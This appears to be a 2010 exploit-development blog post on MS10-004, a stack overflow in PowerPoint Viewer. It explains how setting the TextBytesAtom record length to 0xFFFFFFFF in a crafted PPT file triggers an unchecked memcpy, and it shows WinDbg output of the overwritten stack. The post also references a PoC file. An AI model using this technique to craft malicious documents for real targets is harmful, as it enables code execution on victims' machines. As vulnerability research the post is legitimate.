2010
03.03

Exploiting MS10-004 PPT Viewer

Category: Coding, Exploit Development, RCE / Tag:  / 5 comments

Hi this is Snake,

we are still alive  and I’m here to demonstrating a really cheap bug which occurred in MS PPT Viewer  ( actually  just for fun and showing we are alive :P ). according to MS advisory vulnerability occurs in MS PPT Viewer by specially crafted PPT file. MS also tell us vuln is “TextBytesAtom Record” and it is “Stack Overflow”. lets take a quick look at MS Office binaries documents :)

TextBytesAtom Record

according to MS office documentations , TexBytesAtom is a record for storing The actual characters of the text, not including the trailing return character and it stored as bytes . there is not any additional fields in this record , so how we can overflow the buffer ? just by creating a large record ? after diging the net for more information , i got some info from ZDI : “Due to the lack of bounds checking on the size argument an unchecked memcpy() copies user data from the file to the stack.” but there isn’t any size filed !  maybe thats in hole record structure !? lets look at “Record Structure” in PPT files :


struct RecordHeader {
psrVersion recVer : 4 // unsinged short int
psrInstance recInstance : 12;  // unsinged short int
psrType recType; // unsinged short int
psrSize recLen; // unsinged long int
};

I put some comments on it for making type definitions more familiar and easier to read :)  . There is only to interesting fields for us in record structure. first , recType which demonstrate the record type and the second, recLen which demonstrate record length. according to MS docs this atom is of variable length and depends on the length of the text. recLen filed will automatically filled by PowerPoint during slide creation time . but we can change it’s value  manually at haxoring time :P . I just created a ppt file and filled title with a bunch of A’s.

now let take a dipper look :

in office docs , TexBytesAtom represented by 4008 in decimal . you most looking for hex value in the file which is “A80F” . 4008 or A80F is value for recType in record structure. you can see the recSize filed value right after A80F . you remember ? ZDI mentioned something about memcpy function . this function get unsigned int  for its size argument. so what happent if we change recSize value to -1 ? in hex -1 represent like 0xFFFFFFFF and in unsigned  int world its equal to 4294967295 , the biggest value which can store in 4 byte ! lets try :)

good ! an AV occurred . now just a little debugging :) 


(e14.e18): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=029a29d0 ebx=00000975 ecx=00000445 edx=00000003 esi=029a18b9 edi=00130000
eip=75e99b60 esp=0012ec44 ebp=0012ec4c iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\msvcrt.dll -
msvcrt!memcpy+0x250:
75e99b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd esi
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\system32\ole32.dll -
029a18b9  41414141 41414141 410d4141 41414141
029a18c9  41414141 41414141 41414141 41414141
029a18d9  41414141 41414141 41414141 41414141
029a18e9  41414141 41414141 41414141 41414141
029a18f9  41414141 41414141 41414141 41414141
029a1909  4141410d 41414141 41414141 41414141
029a1919  41414141 41414141 41414141 41414141
029a1929  41414141 41414141 41414141 41414141
0:000> dd edi
00130000  78746341 00000020 00000001 00002fb0
00130010  000000dc 00000000 00000020 00000000
00130020  00000014 00000001 00000007 00000034
00130030  0000017c 00000001 00000000 00000000
00130040  00000000 00000000 00000000 00000002
00130050  1a26ef4e 00000298 00000044 000002e0
00130060  00000250 00000000 f33271ba 00000530
00130070  0000004a 0000057c 0000031e 00000000
0:000> kb
ChildEBP RetAddr  Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012ec4c 75ba4ab0 0012f0bc 029a0975 0000205b msvcrt!memcpy+0x250
0012ec8c 75ba3757 00000975 0012f0bc 0000205b ole32!StgOpenStorage+0x9ed
0012ecb4 75c1b0a8 04563fb8 00000975 00000000 ole32!StringFromIID+0x3ec
0012eea0 75c1b0ea 00000375 00000001 0012f0bc ole32!WriteClassStm+0x1c11
0012eebc 75c1b142 00000375 00000000 0012f0bc ole32!WriteClassStm+0x1c53
0012eed8 75c1b1d4 00000375 00000000 0012f0bc ole32!WriteClassStm+0x1cab
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Microsoft Office\PowerPoint Viewer\PPTVIEW.EXE -
0012ef1c 300eea00 00000000 0012f0bc ffffffff ole32!WriteClassStm+0x1d3d
0012ef34 300f1212 045607b0 00000000 0012f0bc PPTVIEW+0xeea00
0012ef58 300f9aac 0012f0bc ffffffff 02c19a58 PPTVIEW+0xf1212
0012f14c 41414141 41414141 41414141 41414141 PPTVIEW+0xf9aac
0012f150 41414141 41414141 41414141 41414141 0x41414141
0012f154 41414141 41414141 41414141 41414141 0x41414141
0012f158 41414141 41414141 41414141 41414141 0x41414141
0012f15c 41414141 41414141 41414141 41414141 0x41414141
0012f160 41414141 41414141 41414141 41414141 0x41414141
0012f164 41414141 41414141 41414141 41414141 0x41414141
0012f168 41414141 41414141 41414141 41414141 0x41414141
0012f16c 41414141 41414141 41414141 41414141 0x41414141
0012f170 41414141 41414141 41414141 41414141 0x41414141
0012f174 41414141 41414141 41414141 41414141 0x41414141

have fun :)

Poc File :

presentation_MS10_004

references :